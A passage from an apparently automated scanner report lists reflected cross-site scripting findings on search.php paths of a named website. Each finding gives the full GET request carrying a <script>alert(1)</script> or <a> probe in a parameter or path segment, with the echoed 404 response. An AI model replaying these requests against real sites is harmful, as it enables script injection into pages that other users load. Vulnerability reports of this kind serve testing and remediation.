<p>The requested URL /detail/40/themes/kosmos/images/search.php21c24<script>alert(1)</script>f049405c926?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2879. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ae69b<a>3caffd94708 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchae69b<a>3caffd94708&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchae69b<a>3caffd94708&opt=2 was not found on this server.</p>
...[SNIP]...

2.2880. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f494a<a>05e180a3ff0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...f494a<a>05e180a3ff0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...f494a<a>05e180a3ff0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2881. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cd21<script>alert(1)</script>4d619f124ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6cd21<script>alert(1)</script>4d619f124ff=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6cd21<script>alert(1)</script>4d619f124ff=1 was not found on this server.</p>
...[SNIP]...

2.2882. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e09ed<a>db53bd9fb5f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2e09ed<a>db53bd9fb5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2e09ed<a>db53bd9fb5f was not found on this server.</p>
...[SNIP]...

2.2883. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e52d<script>alert(1)</script>13cd46fea40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1e52d<script>alert(1)</script>13cd46fea40/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1e52d<script>alert(1)</script>13cd46fea40/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2884. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52ad6<script>alert(1)</script>ab94bf680a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4052ad6<script>alert(1)</script>ab94bf680a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4052ad6<script>alert(1)</script>ab94bf680a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2885. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bfb12<script>alert(1)</script>c13ea45d330 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesbfb12<script>alert(1)</script>c13ea45d330/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesbfb12<script>alert(1)</script>c13ea45d330/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2886. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae5cd<script>alert(1)</script>c8ed0be7cff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosae5cd<script>alert(1)</script>c8ed0be7cff/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosae5cd<script>alert(1)</script>c8ed0be7cff/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2887. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4523e<script>alert(1)</script>f4b38ed54fc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/search.php4523e<script>alert(1)</script>f4b38ed54fc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php4523e<script>alert(1)</script>f4b38ed54fc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2888. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 55095<a>6760fdb4647 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search55095<a>6760fdb4647&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search55095<a>6760fdb4647&opt=2 was not found on this server.</p>
...[SNIP]...

2.2889. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1f3f7<a>67aac2ab8e2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...1f3f7<a>67aac2ab8e2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...1f3f7<a>67aac2ab8e2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2890. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload db9b5<script>alert(1)</script>f12f06b1ff1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&db9b5<script>alert(1)</script>f12f06b1ff1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&db9b5<script>alert(1)</script>f12f06b1ff1=1 was not found on this server.</p>
...[SNIP]...

2.2891. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4cc0a<a>1546d1c675a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24cc0a<a>1546d1c675a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24cc0a<a>1546d1c675a was not found on this server.</p>
...[SNIP]...

2.2892. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a094<script>alert(1)</script>1a02443b70f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8a094<script>alert(1)</script>1a02443b70f/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8a094<script>alert(1)</script>1a02443b70f/40/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2893. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4baaf<script>alert(1)</script>7bdc0327ad7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/404baaf<script>alert(1)</script>7bdc0327ad7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/404baaf<script>alert(1)</script>7bdc0327ad7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2894. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27f61<script>alert(1)</script>a6d7761031f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes27f61<script>alert(1)</script>a6d7761031f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes27f61<script>alert(1)</script>a6d7761031f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2895. http://www.resellerbase.com/detail/40/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57437<script>alert(1)</script>cca2c0d5930 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/search.php57437<script>alert(1)</script>cca2c0d5930?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php57437<script>alert(1)</script>cca2c0d5930?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2896. http://www.resellerbase.com/detail/40/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d6bfd<a>e169058184b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Searchd6bfd<a>e169058184b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
